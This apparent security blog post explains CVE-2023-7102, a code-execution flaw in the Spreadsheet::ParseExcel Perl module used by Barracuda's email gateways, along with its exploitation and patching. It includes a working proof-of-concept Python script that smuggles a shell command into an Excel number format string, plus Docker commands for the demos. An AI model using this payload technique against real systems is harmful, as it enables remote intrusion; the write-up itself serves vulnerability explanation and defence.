Decoding the Barracuda Networks’ CVE-2023-7102 Vulnerability

In the ever-evolving landscape of cybersecurity, new vulnerabilities emerge that challenge the robustness of our digital defenses.

One such recent discovery is the CVE-2023-7102, a significant Arbitrary Code Execution (ACE) vulnerability found in Barracuda Networks’ Email Security Gateway (ESG) Appliances.

This blog post will delve into the intricacies of this vulnerability, its potential impact, and the steps taken to mitigate its effects.

We’ll explore how it works, why it’s a concern, and what you can do to protect your systems.

Understanding the Risks

A newly discovered Arbitrary Code Execution (ACE) vulnerability, identified as CVE-2023-7102, has been located in Barracuda Networks’ Email Security Gateway (ESG) Appliances.

This potential exploit could enable cybercriminals to remotely execute arbitrary commands on the ESG appliance through a simple email containing a malicious Excel file.

The full Confidentiality, Integrity, and Availability (CIA) triad could be significantly impacted by this exploit.

Publicly available proof-of-concept exploits for this vulnerability have already begun to circulate, and threat actors are actively exploiting it in the wild.

A Deeper Look: Description of CVE-2023-7102 Vulnerability

CVE-2023-7102 is rooted in the use of a third-party Perl module titled “Spreadsheet ParseExcel”. This module is utilized by the “Amavis” virus scanner within Barracuda’s ESG Appliances to analyze Microsoft Excel files.

The vulnerability lies in the fact that “Spreadsheet ParseExcel” allows arbitrary code execution because it transfers unvalidated input from a file into an evaluating string-type. This loophole permits attackers to execute arbitrary commands on the system where the Excel-file is parsed using the “Spreadsheet ParseExcel” module.

When a cyber attacker sends a maliciously crafted Excel file to a susceptible Barracuda ESG Appliance, they can run arbitrary code on the appliance.

This arbitrary code execution is initiated by the “Amavis” virus scanner within an ESG Appliance that leverages the “Spreadsheet ParseExcel” to evaluate the Excel-files attached to an email.

The vulnerability within the “Spreadsheet ParseExcel” module is cataloged under the CVE entry: CVE-2023-7101. The usage of this outdated third-party component (“Spreadsheet ParseExcel”) within Barracuda’s ESG Appliance is documented under the CVE entry: CVE-2023-7102.

Barracuda Networks, in collaboration with Mandiant, has been investigating the exploitation of CVE-2023-7102. Their findings reveal that the vulnerability has been exploited on a limited number of ESG devices to deploy new variants of the SEASPY and SALTWATER malware.

Who is Affected?

The affected entities include the Spreadsheet::ParseExcel version 0.65 and all products that rely on and utilize Spreadsheet::ParseExcel, such as Spreadsheet::ParseXLSX.

The Impact of the Vulnerability

The vulnerability carries a high impact, allowing for Arbitrary Code Execution.

In situations where documents provided by a remote machine are being parsed, this could potentially lead to Remote Code Execution (RCE).

Exploitability of the Vulnerability

The exploitability of this vulnerability is also high.

Threat actors can exploit this vulnerability by using specially crafted Number format strings within XLS and XLSX files, causing the execution of arbitrary code during the parsing process.

Understanding CVE-2023-7102: A Guide

Here, we will provide a simplified guide on how to understand this vulnerability using a proof-of-concept (POC) example available on GitHub.

XLS Payload Python Script:

xls = open('test.xls', 'rb').read()

# Inject shell to format string
shell = "system('whoami > /tmp/inject.txt')"
fmtStr = f'[>123;{shell}]123'
pattern = f'"{"a" * (len(fmtStr) - 2)}"'
print(pattern)

l = xls.index(pattern.encode())
assert l != -1 #Pattern must exist
r = l + len(pattern)

fmtIdx = xls[l - 5:l - 3]
payload_len = len(fmtStr)

xls = xls[:l] + fmtStr.encode() + xls[r:]

# Apply format string to xf
XF_opcode_w_len = b'\xe0\x00\x14\x00' # Assume highest BIFF version
l = xls.index(XF_opcode_w_len) # First means format index = 0
assert l != -1 # XF must exist
xls = xls[:l + 6] + fmtIdx + xls[l + 8:]

# Apply format to cell
RK_opcode = b'\x7e\x02'
l = xls.index(RK_opcode)
assert l != -1 # Date must exist
l += 8

xls = xls[:l] + b'\x00\x00' + xls[l + 2:] # format index 0

open('test.xls', 'wb').write(xls)

Step 1: Memory Corruption

The first part of the POC focuses on demonstrating memory corruption. For this, a Docker image is built and run in the /bomb folder.

The command used here is:

docker build -t perl-xlsx-bomb . && docker run --name perl-xlsx-bomb -m 4g -d perl-xlsx-bomb

In this command, -t perl-xlsx-bomb assigns a name to the new Docker image, while –name perl-xlsx-bomb names the Docker container. The -m 4g flag limits the memory size for the Docker container to 4GB. This container will continuously fill memory, including swap memory, until it eventually terminates due to resource exhaustion.

Step 2: Remote Code Execution (RCE)

The second part of the POC focuses on remote code execution. Again, a Docker image is built and run, but this time in the /rce folder. The command used is:

docker build -t parseexcel-rce . && docker run parseexcel-rce

After each Perl run, this command results in ‘root’ being written in the /tmp/inject.txt file, demonstrating successful arbitrary code execution.

Technical Details of the Vulnerability

Spreadsheet::ParseExcel is a Perl module designed for parsing Excel files. The identified vulnerability is rooted in the way Spreadsheet::ParseExcel handles unvalidated input from a file, passing it into a string-type “eval”.

More specifically, the issue arises from the evaluation of Number format strings (not to be confused with printf-style format strings) within the Excel parsing logic.

Mitigation Measures

In response to the discovery of the Arbitrary Code Execution (ACE) vulnerability in Spreadsheet::ParseExcel, identified as CVE-2023-7102, Barracuda Networks took swift action.

On December 21, 2023, a security upgrade was rolled out to all active Barracuda Email Security Gateway (ESG) devices. This update was designed to address this specific ACE vulnerability and was automatically implemented across the board, eliminating the need for any customer-initiated actions.

However, the story did not end there. Following the initial exploitation of the ACE vulnerability by the threat entity referred to as UNC4841, Barracuda noticed the introduction of new iterations of both SEASPY and SALTWATER malware. These were found on a restricted number of ESG devices.

To counteract these compromised devices showing signs of intrusion linked with these newly detected malware strains, Barracuda promptly issued a patch on December 22, 2023.

The effective response from Barracuda underscores the importance of timely and proactive measures in the face of new cybersecurity threats.

By rapidly deploying updates and patches, it is possible to mitigate the potential damage caused by vulnerabilities like CVE-2023-7102.

Conclusion

Understanding vulnerabilities like CVE-2023-7102 is crucial in today’s digital world.

It’s not just about knowing they exist, but understanding their mechanisms, potential impacts, and ways to mitigate them.

As we’ve seen, CVE-2023-7102 is a potent vulnerability with high exploitability and significant potential for damage.